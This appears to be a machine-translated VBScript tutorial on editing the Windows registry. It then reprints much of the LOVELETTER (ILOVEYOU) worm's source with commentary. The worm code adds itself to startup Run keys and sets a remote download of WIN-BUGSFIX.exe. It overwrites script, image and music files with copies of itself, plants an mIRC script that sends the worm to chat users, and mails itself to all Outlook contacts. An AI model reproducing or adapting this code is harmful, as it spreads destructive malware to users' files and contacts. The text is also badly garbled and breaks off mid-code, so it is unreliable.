VBScript programming 5
Registry, modifying the registry is a basic skill of programming, and scripting is of course no exception.
Here, I will no longer explain the basic structure of the registry.
1. Read the keywords and values of the registry:
The regread method of the WSHSHELL object can be passed by putting the full path of the keyword
E.g:
SET WS = WScript.createObject ("wscript.shell")
v = ws.regread ("HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / Currentversion / Run / NWIZ")
WScript.echo V
2, write registry
There is a written, using the regWrite method using WSHSHELL object
View example:
Path = "HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run /"
SET WS = WScript.createObject ("wscript.shell")
T = ws.regwrite (Path & "JJ", "Hello")
This will
HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run / JJ This key value is changed to Hello. But pay attention: This key value must presented in advance.
If you want to create a new keyword, it also uses this method.
Path = "HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / Currentversion / Run / SSSA2000 / Love /"
SET WS = WScript.createObject ("wscript.shell")
Val = ws.regwrite (path, "nenboy")
Val = ws.regread (PATH)
WScript.echo Val
Delete keywords and values
Use the regdelete method to pass the complete path to Regdelete.
E.g
Val = ws.regdel (PATH)
Note that if you want to delete the value of the keyword, be sure to add "/" in the path, if you do not add a slant line, you will delete the entire keyword.
Ok, the most basic script programming is finished. In fact, the script is also very simple. You look at this source code of the LOVELETTER virus that has been famous. In addition to the email, I didn't speak, others are clear. ?
REM BAROK -LOVELETTER (VBE) Rem by: spyder / ispyder@mail.com / @grammersoft group / manila, philip pines' Note: Program author's signature (possib) on Error ResMe Next Dim Fso, Dirsystem, Dirwin, Dirtemp, EQ, CTR, File, VBScopy, Dow EQ = "" CTR = 0 set fso = createObject ("scripting.filesystemObject") 'Note: FileSystemObject is the most dangerous part of the M $ VBVM system, its The function is very powerful 'Use FSO from the virus to know that by modifying the registry, it can easily prevent the LETTER episode. Set file = fso.opentextfile (wscript.scriptfullname, 1) 'Returns the full path of the current script vbscopy = file.readAll Main ()' Note - Program initialization is completed. sub main () On Error Resume Next dim wscr, rr set wscr = CreateObject ( "WScript.Shell") rr = wscr.RegRead ( "HKEY_CURRENT_USER / Software / Microsoft / Windows Scriptin g Host / Settings / Timeout") if (rr> = 1) THEN WSCR.REGWRITE "HKEY_CURRENT_USER / SOFTWARE / Microsoft / Windows Scripting Host / Settings / Timeout", 0, "REG_DWORD" 'Note - Prevents the termination caused by the operation timeout. 'It should be said that programmers who write viruses take into account possible problems, this is worth all of the programming. Endiffialfolder (0) Set Dirsystem = fso.getspecialfolder (1) Set dirtemp = fso.getspecialFolder (2) 'Get the name of the system key folder "VB can be used when programming. Set c = fso.getfile (wscript.scriptfullname) 'Returns the full path of the current script C.copy (Dirsystem & "/ mskernel32.vbs")' Copies a specified file or folder from one location to another. C.copy (Dirwin & "/ Win32DLL.VBS ") C.copy (Dirsystem &" / Love-letter-for-you.txt.vbs ") 'Copy itself to the key directory. 'The file name is not very good. It's easy to find it. Regruns () html () spreadtoemail () ListAdriv () End Sub
Sub regruns () 'Modify the registry to automatically load the virus program' prevention: often check this branch in the registry. 'Known methods also put HTA in a Startup folder. The method used by the virus program is more advanced, 'Because it does not fail because of language problems.
On Error Resume Next Dim num, downread regcreate "HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersio n / Run / MSKernel32", dirsystem & "/ MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersio n / RunServices / Win32DLL" , dirwin & "/ Win32DLL.vbs" downread = "" downread = regget ( "HKEY_CURRENT_USER / Software / Microsoft / Internet Explore r / Download Directory") if (downread = "") then downread = "c: /" end if if ( FileExist (Dirsystem & "/ Winfat32.exe") = 1) Ten Randomize Num = INT ((4 * RND) 1) if Num = 1 Then Regreate "HKCU / Software / Microsoft / Internet Explorer / Main / Start Page", " http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj w6587345gvsdf7679njbvYT / WIN-BUGSFIX.exe "elseif num = 2 then regcreate" HKCU / Software / Microsoft / Internet Explorer / Main / Start Page "," http: // www .skyinet.net / ~ angelcat / skladjflfdjghKJnwetryDGFikjUIyqwerWe 546786324hjk4jnHHGbvbmKLJKjhkqj4w / WIN-BUGSFIX.exe "elseif num = 3 then regcreate" HKCU / Software / Microsoft / Internet Explorer / Main / Sta rt Page "," http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm POhfgER67b3Vbvg / WIN-BUGSFIX.exe "elseif num = 4 then regcreate" HKCU / Software / Microsoft / Internet Explorer / Main / Start Page "," http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg / WIN-B UGSFIX.exe "end if end if if (fileexist (downread &" / WIN-BUGSFIX.exe ") = 0) then regcreate" HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersio N / Run / Win-Bugsfix ", DownRead &"
/WIN-BUGSFIX.exe "regcreate" HKEY_CURRENT_USER / Software / Microsoft / Internet Explorer / Main / Start Page "," about: blank "end if end subsub folderlist (folderspec) 'Traverse Folder On Error Resume Next dim f, f1, sf set f = fso.getfolder (folderspec) set sf = f.subfolders 'Get all subfolders of a particular folder, including system hidden folder for Each F1 in sf' F1 object infectfiles for each subfolder (f1.path) 'Operation Folderlist (f1.path) in Infectious files Folder Download NEXT END SUB
Sub ListAdriv 'traverses all drives. On Error Resume Next DIM D, DC, S set DC = fso.drives for Each D in DC if D.driveType = 2 or D.DriveType = 3 THEN '2.3 is hard disk and network sharing disk FolderList (D.Path & "/ ") End if next listadriv = s end sub
Function FileExist (filespec) 'Judging whether the file has' purely from the technical perspective, this program is not working. 'Don't write so long, you can implement the same function on Error Resume next Dim Msg if (fso.fileexists (filespec)) THEN MSG = 0 else msg = 1 end if fileexist = msg End Function
Function FolderExist (folderspec) 'Decision is as stinking with the folder' and the previous program. On Error ResMe Next Dim Msg IF (Fso.GetFoldRexists (FSO.GETFOLDEREXISTS (Folderspec)) THEN MSG = 0 else msg = 1 end if fileexist = msg end function
Sub infectfiles (folderspec) 'Performs the operation of the infectious file.
On Error ResMe Next Dimf, F1, FC, EXT, AP, MIRCFNAME, S, BNAME, MP3 set f = fso.getfolder (folderspec) set fc = f.files' Get all files of a particular folder, including the system Hidden File for Each F1 in FC EXT = fso.GETEXTENSITIONNAME (F1.Path) 'Get Extensions EXT = LCase (EXT)' Transition to lowercase S = LCase (f1.name) IF (ext = "vbs") or (ext = "VBE") THEN SET AP = fso.opentextFile (f1.path, 2, true) ap.write vbscopy 'vbscopy = file.readall ap.close elseif (ext = "js") or (ext = "jse") OR (ext = "css") or (ext = "wsh") or (ext = "hta") The set ap = fso.opentextfile (f1.path, 2, true) AP. Write vbscopy ap.close bName = fso.getBaseName (f1.path) set copick = fso.getfile (f1.path) Cop.copy (folderspec & "/" & bname & ". vbs") fso.deletefile (f1.path) Elseif Ext = "jpg") or (ext = "jpeg") THEN SET AP = fso.opentextFile (f1.path, 2, true) ap.write vbscopy ap.close set cop = fso.getfile (f1.path) COP. COPY (F1.Path & "VBS") fso.deletefile (f1.path) Elseif (ext = "mp3") or (ext = "mp2") THEN SET MP3 = fso.createtextFile (f1.path & ". vbs") Mp3.write vbscopy mp3.close set at T = fso.getfile (f1.path) att.attributes = att.attributes 2 end if if (eq <> folderspec) THEN IF (S = "mirc32.exe") or (s = "mlink32.exe") or (s = "mirc.ini") or (s = "scri pt.ini") or (s = "mirc.hlp") THEN SET scriptini = fso.createtetextfile (Folderspec & "/ script.ini") scriptini.writeline [script] "scriptini.writeline"; mirc script "scriptini.writeline";
Please dont edit this script ... mirc will Corru PT, IF mirc will "scriptini.writeline" Corrupt ... Windows Will Affect and Will Not Run Correctly. Thanks "'The English in the virus Author did not learn well ... but so frightened People are also suffering. 'Here, you will remind you to pay attention, don't care about the scary text, you will find a lot of vulnerabilities. Scriptini.writeline ";" scriptini.writeline "; khaled mardam-bey" scriptini.writeline " http://www.mirl.com "scriptini.writeline"; "scriptini.writeline" n0 = on 1: join: #: {"scriptini.writeLine" n1 = / if ($ nick == $ me) {halt } "scriptini.writeline" n2 = /.dcc send $ nick "& Dirsystem &" / Love-letter-fo r-you.htm "scriptini.writeLine" N3 =} "pay attention, the result of this is that MIRC can also be infected Virus. Scriptini.close EQ = folderspec end if end if next end subsub regreate (regable, regvalue) 'Modifying the registry (creating key)' This program seems to be a Microsoft's demonstration program. SET regedit = CreateObject ("wscript.shell" ) regedit.regwrite regkey, Regvalue End Sub
Function Regget (Value) 'This program seems to be a Microsoft's demonstration program. (WSH Demonstration, in Windows Folder) SET regedit = CreateObject ("wscript.shell") regget = regedit.regread (value) end function
sub spreadtoemail () 'diffusion Email On Error Resume Next dim x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad set regedit = CreateObject ( "WScript.Shell") set out = WScript.CreateObject ( " Outlook.Application ") 'Virus Limitations: Only Outlook, and Outlook Express does not support. set mapi = out.GetNameSpace ( "MAPI") for ctrlists = 1 to mapi.AddressLists.Count set a = mapi.AddressLists (ctrlists) x = 1 regv = regedit.RegRead ( "HKEY_CURRENT_USER / Software / Microsoft / WAB /" & a ) IF (regv = ") THEN REGV = 1 end if if (int (a.addressentries.count)> int (regv)) THEN for ctrentries = 1 to a.addressentries.count MaleAd = a.addressentries (x) Regad = "" Regad = regedit.regread ("HKEY_CURRENT_USER / SOFTWARE / Microsoft / WAB /" & MALE AD) IF (regad = ") THEN SET MALE = out.createItem (0) Male.Recipients.Add (MaleAd) Male.Subject = "IloveYou" The reason for the name of the virus' "see such a message is definitely a virus. The normal person of the mind is probably not straightforward. male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from m e." male.Attachments.Add (dirsystem & "/ LOVELETTER-FOR-YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER / Software / Microsoft / WAB / "& malead, 1," REG_DWORD "end if x = x 1 next regedit.RegWrite" HKEY_CURRENT_USER / Software / Microsoft / WAB / "& a, a.Addre ssEntries.Count else regedit.RegWrite" HKEY_CURRENT_USER / Software / Microsoft / WAB / "& A, A.Addre Ssentries.count End End Set Out = Nothing SET MAPI = Nothing End Sub Sub HTML 'From the technical point of view, this program is very beautiful, the reason is to fully utilize Outlook Resource 'deserves the reference of the program. 'The _ symbol in the middle of the program is the cable, so the comment is written here. 'There are many invalid statements in the program, and there are a lot of space.
On Error ResMe next Dim line, N, DTA1, DTA2, DT1, DT2, DT3, DT4, L1, DT5, DT6 DTA1 = "
,
Philippines
? -? March 2000 @ - @> "& vbcrlf & _" "& vbcrlf & _" -? Head>
this html file needed ActiveX Control -? p>
to enable to r Ead this html file
- please press # - # Yes # - # Button to enable Active x -? p> "& vbcrlf & _" center>